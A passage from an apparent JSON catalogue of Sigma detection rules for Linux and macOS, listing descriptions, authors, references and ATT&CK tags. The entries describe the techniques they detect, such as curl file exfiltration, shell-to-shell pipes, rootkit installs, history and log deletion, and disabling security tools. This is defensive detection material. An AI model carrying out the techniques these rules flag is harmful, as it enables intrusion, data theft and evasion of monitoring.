process running or break out from restricted environments", - "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/06", - "falsepositive": [ - "Administrators or installed processes that leverage nohup" - ], - "filename": "proc_creation_lnx_nohup.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://gtfobins.github.io/gtfobins/nohup/", - "https://en.wikipedia.org/wiki/Nohup", - "https://www.computerhope.com/unix/unohup.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" - ], - "tags": "No established tags" - }, - "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", - "value": "Nohup Execution" - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/10/15", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider ExecuteScript." - ], - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ] - }, - "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", - "value": "OMIGOD SCX RunAsProvider ExecuteScript" - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/10/15", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." - ], - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ] - }, - "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" - }, - { - "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_process_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ] - }, - "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", - "value": "Process Discovery" - }, - { - "description": "Detects setting proxy configuration", - "meta": { - "author": "Ömer Günal", - "creation_date": "2020/06/17", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_proxy_connection.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1090/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1090" - ] - }, - "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", - "value": "Connection Proxy" - }, - { - "description": "Detects python spawning a pretty tty", - "meta": { - "author": "Nextron Systems", - "creation_date": "2022/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_lnx_python_pty_spawn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", - "value": "Python Spawning Pretty TTY" - }, - { - "description": "Detects the enumeration of other remote systems.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/22", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_remote_system_discovery.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", - "value": "Linux Remote System Discovery" - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_schedule_task_job_cron.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ] - }, - "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", - "value": "Scheduled Cron Task/Job - Linux" - }, - { - "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_lnx_security_software_discovery.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", - "value": "Security Software Discovery - Linux" - }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/06/17", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_security_tools_disabling.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", - "value": "Disabling Security Tools" - }, - { - "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_services_stop_and_disable.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", - "value": "Disable Or Stop Services" - }, - { - "description": "Detects suspicious change of file privileges with chown and chmod commands", - "meta": { - "author": "Ömer Günal", - "creation_date": "2020/06/16", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_setgid_setuid.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", - "https://attack.mitre.org/techniques/T1548/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", - "value": "Setuid and Setgid" - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ] - }, - "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", - "value": "Sudo Privilege Escalation CVE-2019-14287" - }, - { - "description": "Detects chmod targeting files in abnormal directory paths.", - "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/03", - "falsepositive": [ - "Admin changing file permissions." - ], - "filename": "proc_creation_lnx_susp_chmod_directories.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ] - }, - "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", - "value": "Chmod Suspicious Directory" - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "filename": "proc_creation_lnx_susp_curl_fileupload.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ] - }, - "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", - "value": "Suspicious Curl File Upload - Linux" - }, - { - "description": "Detects a suspicious curl process start on linux with set useragent options", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/15", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "filename": "proc_creation_lnx_susp_curl_useragent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "b86d356d-6093-443d-971c-9b07db583c68", - "value": "Suspicious Curl Change User Agents - Linux" - }, - { - "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_susp_history_delete.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ] - }, - "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", - "value": "History File Deletion" - }, - { - "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_susp_history_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ] - }, - "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", - "value": "Print History File Contents" - }, - { - "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/14", - "falsepositive": [ - "Legitimate software that uses these patterns" - ], - "filename": "proc_creation_lnx_susp_interactive_bash.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" - ], - "tags": "No established tags" - }, - "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", - "value": "Interactive Bash Suspicious Children" - }, - { - "description": "Detects java process spawning suspicious children", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_lnx_susp_java_children.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.tecmint.com/different-types-of-linux-shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", - "value": "Suspicious Java Children Processes" - }, - { - "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/14", - "falsepositive": [ - "Legitimate software that uses these patterns" - ], - "filename": "proc_creation_lnx_susp_pipe_shell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ] - }, - "uuid": "880973f3-9708-491c-a77b-2a35a1921158", - "value": "Linux Shell Pipe to Shell" - }, - { - "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_susp_recon_indicators.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004", - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", - "value": "Linux Recon Indicators" - }, - { - "description": "Detects system information discovery commands", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_system_info_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", - "value": "System Information Discovery" - }, - { - "description": "Detects usage of system utilities to discover system network connections", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_lnx_system_network_connections_discovery.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", - "value": "System Network Connections Discovery - Linux" - }, - { - "description": "Detects enumeration of local network configuration", - "meta": { - "author": "Ömer Günal and remotephone, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_lnx_system_network_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", - "value": "System Network Discovery - Linux" - }, - { - "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ] - }, - "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", - "value": "Triple Cross eBPF Rootkit Execve Hijack" - }, - { - "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1014" - ] - }, - "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", - "value": "Triple Cross eBPF Rootkit Install Commands" - }, - { - "description": "Detects suspicious sub processes of web server processes", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali (update)", - "creation_date": "2021/10/15", - "falsepositive": [ - "Web applications that invoke Linux command line tools" - ], - "filename": "proc_creation_lnx_webshell_detection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "linux", - "refs": [ - "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", - "value": "Linux Webshell Indicators" - }, - { - "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/23", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "file_event_macos_emond_launch_daemon.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", - "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.014" - ] - }, - "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", - "value": "MacOS Emond Launch Daemon" - }, - { - "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "file_event_macos_startup_items.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1037.005" - ] - }, - "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", - "value": "Startup Items" - }, - { - "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Application installers might contain scripts as part of the installation process." - ], - "filename": "proc_creation_macos_applescript.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.002" - ] - }, - "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", - "value": "MacOS Scripting Interpreter AppleScript" - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_base64_decode.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", - "value": "Decode Base64 Encoded Text -MacOs" - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate script work" - ], - "filename": "proc_creation_macos_binary_padding.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ] - }, - "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", - "value": "Binary Padding - MacOS" - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_change_file_time_attr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", - "value": "File Time Attribute Change" - }, - { - "description": "Detects deletion of local audit logs", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_clear_system_logs.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ] - }, - "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", - "value": "Indicator Removal on Host - Clear Mac System Logs" - }, - { - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_create_account.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ] - }, - "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", - "value": "Creation Of A Local User Account" - }, - { - "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/10", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_create_hidden_account.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ] - }, - "uuid": 